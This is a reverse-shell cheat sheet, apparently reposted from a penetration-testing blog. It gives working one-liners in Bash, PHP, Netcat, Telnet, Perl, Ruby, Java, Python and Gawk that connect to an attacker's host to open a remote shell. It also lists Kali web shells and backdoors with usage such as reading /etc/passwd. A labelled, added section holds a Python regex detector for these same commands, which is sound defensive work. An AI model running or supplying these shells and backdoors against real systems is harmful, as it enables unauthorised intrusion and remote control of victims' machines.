Start a Netcat listener locally on a legitimate port that is likely to be allowed, such as 80 or 443:
# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...
Note: If the machine that connects back sits inside a NAT-routed network, you need to set up port forwarding to reach that network, for example with the Port_forward module in Metasploit.
Bash Reverse Shells
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
PHP Reverse Shell
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes the TCP connection uses file descriptor 3. If it doesn't work, try 4, 5, or 6.)
Netcat Reverse Shell
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
Telnet Reverse Shell
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
Perl Reverse Shell
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl Windows Reverse Shell
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby Reverse Shell
ruby -rsocket -e 'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Java Reverse Shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Gawk Reverse Shell
#!/usr/bin/gawk -f
BEGIN {
    Port = 8080
    Prompt = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}
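Detection note (an added example, not part of the original cheat sheet): the one-liners above share a small set of command-line signatures, which the sketch below matches against process-execution records. The rule names, the pid<TAB>cmdline record format and the sample records (using the documentation address 192.0.2.10) are constructed for this example.

```python
import re

# Signatures taken from the one-liner families listed above.
# Rule names are labels invented for this example.
RULES = [
    ("bash-dev-tcp", re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+")),
    ("gawk-inet", re.compile(r"/inet/(tcp|udp)/\d+/")),
    ("nc-exec", re.compile(r"\b(nc|ncat|netcat)\b.*\s-\w*e\w*\s+\S*(sh|bash)\b")),
    ("fifo-relay", re.compile(r"\b(mknod\s+\S+\s+p|mkfifo\s+\S+)\b.*\b(nc|ncat|netcat|telnet)\b")),
    ("sh-fd-redirect", re.compile(r"/bin/(ba)?sh\s+-i\s+<&\s*\d+\s+>&\s*\d+")),
    ("fd-dup-shell", re.compile(r"os\.dup2\(\s*\w+\.fileno\(\)")),
    ("perl-socket", re.compile(r"\bperl\b.*(use Socket|IO::Socket::INET).*\b(exec|system)")),
    ("php-fsockopen", re.compile(r"\bphp\b.*fsockopen\s*\(.*\bexec\s*\(")),
    ("ruby-tcpsocket", re.compile(r"\bruby\b.*TCPSocket\.open.*\bexec\b")),
]

# Constructed sample: one "pid<TAB>cmdline" record per line, as an EDR or
# auditd export might be flattened. The last two records are benign.
SAMPLE = """\
4101\tbash -i >& /dev/tcp/192.0.2.10/80 0>&1
4102\tnc -e /bin/sh 192.0.2.10 80
4103\tsh -c rm -f /tmp/p; mknod /tmp/p p && nc 192.0.2.10 4444 0/tmp/p
4104\tpython -c import socket,subprocess,os;s=socket.socket();s.connect(("192.0.2.10",80));os.dup2(s.fileno(),0)
4105\tnc -nvlp 80
4106\tcurl -sS https://example.com/index.html
"""

def classify(cmdline):
    """Return the sorted names of every rule that matches one command line."""
    return sorted(name for name, rx in RULES if rx.search(cmdline))

def scan(records):
    """Parse 'pid<TAB>cmdline' records; return [(pid, [rule, ...])] for hits only."""
    hits = []
    for rec in records.splitlines():
        pid, _, cmdline = rec.partition("\t")
        rules = classify(cmdline)
        if rules:
            hits.append((int(pid), rules))
    return hits

if __name__ == "__main__":
    for pid, rules in scan(SAMPLE):
        print(pid, ",".join(rules))
```

Command-line matching only catches the literal forms; pair it with network telemetry such as a shell process owning an outbound socket, which does not depend on how the command was spelled.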
Kali Web Shells
Kali PHP Web Shells
/usr/share/webshells/php/php-reverse-shell.php | Pen Test Monkey - PHP Reverse Shell
/usr/share/webshells/php/php-findsock-shell.php, /usr/share/webshells/php/findsock.c | Pen Test Monkey, Findsock Shell. Build with gcc -o findsock findsock.c (be mindful of the target server's architecture); execute with netcat, not a browser: nc -v target 80
/usr/share/webshells/php/simple-backdoor.php | PHP backdoor, useful for CMD execution if upload / code injection is possible. Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
/usr/share/webshells/php/php-backdoor.php | Larger PHP shell, with a text input box for command execution.
Kali Perl Reverse Shell
/usr/share/webshells/perl/perl-reverse-shell.pl | Pen Test Monkey - Perl Reverse Shell
/usr/share/webshells/perl/perlcmd.cgi | Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat/etc/passwd
Kali Cold Fusion Shell
/usr/share/webshells/cfm/cfexec.cfm | Cold Fusion Shell - aka CFM Shell
Kali ASP Shell
/usr/share/webshells/asp/ | Kali ASP Shells
Kali ASPX Shells
/usr/share/webshells/aspx/ | Kali ASPX Shells
Kali JSP Reverse Shell
/usr/share/webshells/jsp/jsp-reverse.jsp | Kali JSP Reverse Shell
Original link address: https://highon.coffee/blog/reverse-shell-cheat-sheet/
Some other articles that summarize reverse shells and forwarding:
Penetration testing: reverse shell and forwarding summary (Reverse Shell During the Penetration Test): http://le4f.net/post/post/Reverse-shell-during-the-penetration-test
Both bloggers also have other good material on their blogs that is worth reading.
Reverse Shell Cheat Sheet